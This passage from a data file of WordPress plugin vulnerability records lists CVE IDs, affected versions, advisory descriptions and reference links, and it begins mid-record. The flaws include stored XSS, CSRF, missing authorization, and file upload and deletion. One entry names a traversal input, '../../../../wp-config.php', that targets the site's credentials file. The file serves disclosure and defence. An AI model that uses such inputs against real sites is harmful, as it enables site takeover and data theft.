replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb67f02-87e8-4ca3-8a9d-6663a700ab5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb67f02-87e8-4ca3-8a9d-6663a700ab5b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L894\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L894\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1349","slug":"embedpress","versionImpact":"3.9.8","description":"The EmbedPress \u2013 Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/631d200f-7b0b-4105-b91e-030af459ba99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/631d200f-7b0b-4105-b91e-030af459ba99?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0449","slug":"artibot","versionImpact":"1.1.6","description":"The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/450d0748-93d6-448a-97a2-06fc2f8065b3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/artibot\\\/trunk\\\/artibot.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/artibot\\\/trunk\\\/artibot.php#L52\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7410","slug":"my-custom-css","versionImpact":"3.3","description":"The My Custom CSS PHP & ADS plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.3. This is due to the plugin not preventing direct access to the \/my-custom-css\/vendor\/mobiledetect\/mobiledetectlib\/export\/exportToJSON.php file, which displays the full filesystem path when requested directly. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d145d0af-e364-4cc3-af4f-03117eb34637?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d145d0af-e364-4cc3-af4f-03117eb34637?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-custom-css\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-custom-css\\\/trunk\\\/vendor\\\/mobiledetect\\\/mobiledetectlib\\\/export\\\/exportToJSON.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9271","slug":"rewp","versionImpact":"1.0.1","description":"The Re:WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7d340b9-6a77-481c-983c-f4774ecff285?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7d340b9-6a77-481c-983c-f4774ecff285?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rewp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rewp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161983\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161983\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9627","slug":"green-wp-telegram-bot-by-teplitsa","versionImpact":"1.3","description":"The TeploBot - Telegram Bot for WP plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'service_process' function in all versions up to, and including, 1.3. This makes it possible for unauthenticated attackers to view the Telegram Bot Token, which is a secret token to control the bot.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/091dadcb-71ac-4321-b3aa-72b5fbbd9163?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/091dadcb-71ac-4321-b3aa-72b5fbbd9163?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/green-wp-telegram-bot-by-teplitsa\\\/trunk\\\/inc\\\/core.php?rev=1754863#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/green-wp-telegram-bot-by-teplitsa\\\/trunk\\\/inc\\\/core.php?rev=1754863#L266\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10853","slug":"buy-one-click-woocommerce","versionImpact":"2.2.9","description":"The Buy one click WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the removeorder AJAX action in all versions up to, and including, 2.2.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete Buy one click WooCommerce orders.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad73f105-fea8-4bbe-946b-97e61b4b9e57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad73f105-fea8-4bbe-946b-97e61b4b9e57?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11082","slug":"tumult-hype-animations","versionImpact":"1.9.15","description":"The Tumult Hype Animations plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the hypeanimations_panel() function in all versions up to, and including, 1.9.15. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/tumult\\\/hype-wordpress-plugin\\\/commit\\\/1702d3d4fd0fae9cb9fc40cdfc3dfb8584d5f04c\",\"name\":\"https:\\\/\\\/github.com\\\/tumult\\\/hype-wordpress-plugin\\\/commit\\\/1702d3d4fd0fae9cb9fc40cdfc3dfb8584d5f04c\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tumult-hype-animations\\\/trunk\\\/includes\\\/adminpanel.php#L277\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tumult-hype-animations\\\/trunk\\\/includes\\\/adminpanel.php#L277\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197761\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197761\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tumult-hype-animations\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tumult-hype-animations\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3a0b4b-cce5-4d78-99d5-697f2cf04427?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3a0b4b-cce5-4d78-99d5-697f2cf04427?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12279","slug":"wp-fb-autoconnect","versionImpact":"4.6.2","description":"The WP Social AutoConnect plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211577\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211577\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-fb-autoconnect\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-fb-autoconnect\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/392d8286-a5fd-4d5d-9f6a-f13564013edc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/392d8286-a5fd-4d5d-9f6a-f13564013edc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13650","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.34","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'PAFE Before After Image Comparison Slider' widget in all versions up to, and including, 2.4.34 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/piotnet-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/piotnet-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e3d0ffd-209b-4e29-bc1d-91f2498b4632?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e3d0ffd-209b-4e29-bc1d-91f2498b4632?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47658","slug":"elex-helpdesk-customer-support-ticket-system","versionImpact":"3.2.7","description":"Unrestricted Upload of File with Dangerous Type vulnerability in the ELEX WordPress HelpDesk & Customer Ticketing System plugin by ELEXtensions allows an attacker to upload a web shell to the web server. This issue affects ELEX WordPress HelpDesk & Customer Ticketing System: from n\/a through 3.2.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/elex-helpdesk-customer-support-ticket-system\\\/vulnerability\\\/wordpress-elex-wordpress-helpdesk-customer-ticketing-system-3-2-7-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/elex-helpdesk-customer-support-ticket-system\\\/vulnerability\\\/wordpress-elex-wordpress-helpdesk-customer-ticketing-system-3-2-7-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8104","slug":"wp-memory","versionImpact":"3.98","description":"The Memory Usage plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.98. This is due to missing nonce validation in the wpmemory_install_plugin() function. This makes it possible for unauthenticated attackers to silently install one of the several whitelisted plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-memory\\\/tags\\\/3.98\\\/wpmemory.php#L376\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-memory\\\/tags\\\/3.98\\\/wpmemory.php#L376\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333316\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333316\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-memory\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-memory\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbaf06b2-9ac3-4882-9212-fdcecdc5fb8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbaf06b2-9ac3-4882-9212-fdcecdc5fb8c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0726","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_edit_folder function. This makes it possible for unauthenticated attackers to invoke this function via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link, and thereby perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b88442-3961-42e2-8ff4-7726819a7f0f\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b88442-3961-42e2-8ff4-7726819a7f0f\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5507","slug":"imagemapper","versionImpact":"1.2.6","description":"The ImageMapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'imagemap' shortcode in versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6e687e9-6ffe-4457-8d57-3c03f657eb74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6e687e9-6ffe-4457-8d57-3c03f657eb74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L402\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L402\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7089","slug":"easy-svg-image-allow","versionImpact":"1.0","description":"The Easy SVG Allow WordPress plugin through 1.0 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b8ba734-7764-4ab6-a7e2-8de55bd46bed\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b8ba734-7764-4ab6-a7e2-8de55bd46bed\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1340","slug":"login-lockdown","versionImpact":"2.08","description":"The Login Lockdown \u2013 Protect Login Form plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the generate_export_file function in all versions up to, and including, 2.08. This makes it possible for authenticated attackers, with subscriber access and higher, to export this plugin's settings that include whitelisted IP addresses as well as a global unlock key. With the global unlock key an attacker can add their IP address to the whitelist.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34021007-b5d3-479b-a0d4-50e301f22c9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34021007-b5d3-479b-a0d4-50e301f22c9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-lockdown\\\/trunk\\\/libs\\\/functions.php#L492\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-lockdown\\\/trunk\\\/libs\\\/functions.php#L492\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033542%40login-lockdown%2Ftrunk&old=3027788%40login-lockdown%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033542%40login-lockdown%2Ftrunk&old=3027788%40login-lockdown%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0447","slug":"artibot","versionImpact":"1.1.6","description":"The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the artibot_update function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to update plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/848f36de-c62a-45ee-b259-46dab73e4439?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/848f36de-c62a-45ee-b259-46dab73e4439?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/artibot\\\/trunk\\\/artibot.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/artibot\\\/trunk\\\/artibot.php#L60\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1897","slug":"new-grid-gallery","versionImpact":"1.4.3","description":"The Grid Gallery \u2013 Photo Image Grid Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.3 via deserialization, in a shortcode, of untrusted input taken from the awl_gg_settings_ meta value. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39f5777b-38b0-4fc6-909d-61eaa1de6173?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39f5777b-38b0-4fc6-909d-61eaa1de6173?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/new-grid-gallery\\\/tags\\\/1.4.0\\\/grid-gallery-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/new-grid-gallery\\\/tags\\\/1.4.0\\\/grid-gallery-shortcode.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7382","slug":"linkify-text","versionImpact":"1.9.1","description":"The Linkify Text plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.9.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/107548a1-3b5b-4838-815b-32b86e1b7ff5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/107548a1-3b5b-4838-815b-32b86e1b7ff5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkify-text\\\/tags\\\/1.9.1\\\/tests\\\/bootstrap.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkify-text\\\/tags\\\/1.9.1\\\/tests\\\/bootstrap.php#L8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9071","slug":"easy-demo-importer","versionImpact":"1.1.2","description":"The Easy Demo Importer \u2013 A Modern One-Click Demo Import Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27a1f457-6bd9-41eb-83e1-cb9e62950041?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27a1f457-6bd9-41eb-83e1-cb9e62950041?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-demo-importer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-demo-importer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162305\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162305\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10852","slug":"buy-one-click-woocommerce","versionImpact":"2.2.9","description":"The Buy one click WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the buy_one_click_export_options AJAX action in all versions up to, and including, 2.2.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/230eb20c-2d0e-4056-b341-4c2db584b70a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/230eb20c-2d0e-4056-b341-4c2db584b70a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39431","slug":"amazon-showcase-wordpress-widget","versionImpact":"2.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Aaron Forgue Amazon Showcase WordPress Plugin allows Stored XSS. This issue affects Amazon Showcase WordPress Plugin: from n\/a through 2.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/amazon-showcase-wordpress-widget\\\/vulnerability\\\/wordpress-amazon-showcase-wordpress-plugin-plugin-2-2-csrf-to-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/amazon-showcase-wordpress-widget\\\/vulnerability\\\/wordpress-amazon-showcase-wordpress-plugin-plugin-2-2-csrf-to-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6755","slug":"game-users-share-buttons","versionImpact":"1.3.0","description":"The Game Users Share Buttons plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the ajaxDeleteTheme() function in all versions up to, and including, 1.3.0. This makes it possible for Subscriber-level attackers to add arbitrary file paths (such as ..\/..\/..\/..\/wp-config.php) to the themeNameId parameter of the AJAX request, which can lead to remote code execution.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/game-users-share-buttons\\\/tags\\\/1.3.0\\\/game-users-share-buttons.php#L638\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/game-users-share-buttons\\\/tags\\\/1.3.0\\\/game-users-share-buttons.php#L638\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/game-users-share-buttons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/game-users-share-buttons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f861ece5-21e4-4c7f-8701-bd9492b1b8bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f861ece5-21e4-4c7f-8701-bd9492b1b8bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
